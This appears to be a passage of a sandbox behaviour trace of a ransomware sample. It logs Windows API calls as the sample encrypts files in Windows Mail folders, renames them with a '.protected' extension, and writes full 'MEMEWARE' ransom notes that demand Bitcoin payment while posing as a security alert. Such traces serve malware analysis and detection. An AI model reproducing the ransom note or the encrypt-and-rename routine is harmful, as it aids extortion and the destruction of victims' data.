liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.293] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0094.293] WriteFile (in: 
hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0094.293] CloseHandle (hObject=0x154) returned 1 [0094.294] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.protected") returned 94 [0094.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat.protected")) returned 1 [0094.294] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0094.294] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0094.295] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\RESTORE_FILES.txt") returned 86 [0094.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.295] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.295] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0094.296] lstrlenA (lpString="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") returned 684 [0094.296] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 
[0094.296] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.296] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0094.296] CloseHandle (hObject=0x150) returned 1 [0094.296] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.296] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.296] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt") returned 82 [0094.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.297] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.297] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.298] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.298] WriteFile (in: hFile=0x14c, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.298] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.298] CloseHandle (hObject=0x14c) returned 1 [0094.299] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Windows") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files (x86)") returned -1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="$Recycle.bin") returned 1 [0094.299] lstrcmpiW (lpString1="edb.chk", lpString2="System Volume Information") returned -1 [0094.299] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.299] StrStrIW (lpFirst="edb.chk", lpSrch=".protected") returned 0x0 [0094.299] lstrcmpW (lpString1="edb.chk", lpString2="RESTORE_FILES.txt") returned -1 [0094.299] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.299] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.299] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".rar") returned 0x0 [0094.300] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0094.300] StrStrW (lpFirst="edb.chk", lpSrch=".zip") returned 0x0 [0094.300] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0094.328] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.328] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0094.329] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.329] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.329] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.329] CloseHandle (hObject=0x14c) returned 1 [0094.329] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected") returned 75 [0094.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk.protected")) returned 1 [0094.330] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Windows") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Program Files") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="Program Files (x86)") returned -1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="$Recycle.bin") returned 1 [0094.330] lstrcmpiW (lpString1="edb.log", lpString2="System Volume Information") returned -1 [0094.330] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.330] StrStrIW (lpFirst="edb.log", lpSrch=".protected") returned 0x0 [0094.330] lstrcmpW (lpString1="edb.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.331] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.331] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x30) returned 1 [0094.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".rar") returned 0x0 [0094.331] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0094.331] StrStrW (lpFirst="edb.log", lpSrch=".zip") returned 0x0 [0094.331] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.350] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.350] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.350] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.350] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.353] WriteFile 
(in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.353] CloseHandle (hObject=0x14c) returned 1 [0094.367] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected") returned 75 [0094.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log.protected")) returned 1 [0094.368] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0094.368] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0094.368] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.368] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0094.368] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0094.368] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.368] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, 
pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.368] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0094.369] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0094.369] StrStrW (lpFirst="edb00001.log", lpSrch=".zip") returned 0x0 [0094.369] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.371] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.372] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.372] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.372] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: 
lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.373] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.373] CloseHandle (hObject=0x14c) returned 1 [0094.390] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected") returned 80 [0094.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log.protected")) returned 1 [0094.391] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Windows") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="Program Files (x86)") returned -1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="$Recycle.bin") returned 1 [0094.391] lstrcmpiW (lpString1="edbres00001.jrs", lpString2="System Volume Information") returned -1 [0094.391] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.391] StrStrIW (lpFirst="edbres00001.jrs", lpSrch=".protected") returned 0x0 [0094.391] lstrcmpW (lpString1="edbres00001.jrs", lpString2="RESTORE_FILES.txt") returned -1 [0094.391] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.391] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.391] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".rar") returned 0x0 [0094.392] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0094.392] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".zip") returned 0x0 [0094.392] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.394] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.394] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0094.394] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 
out: lpNewFilePointer=0x0) returned 1 [0094.394] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0094.395] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0094.395] CloseHandle (hObject=0x14c) returned 1 [0094.395] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected") returned 83 [0094.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.protected")) returned 1 [0094.396] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Windows") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="Program Files (x86)") returned -1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="$Recycle.bin") returned 1 [0094.396] lstrcmpiW (lpString1="edbres00002.jrs", lpString2="System Volume Information") returned -1 [0094.396] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0094.396] StrStrIW 
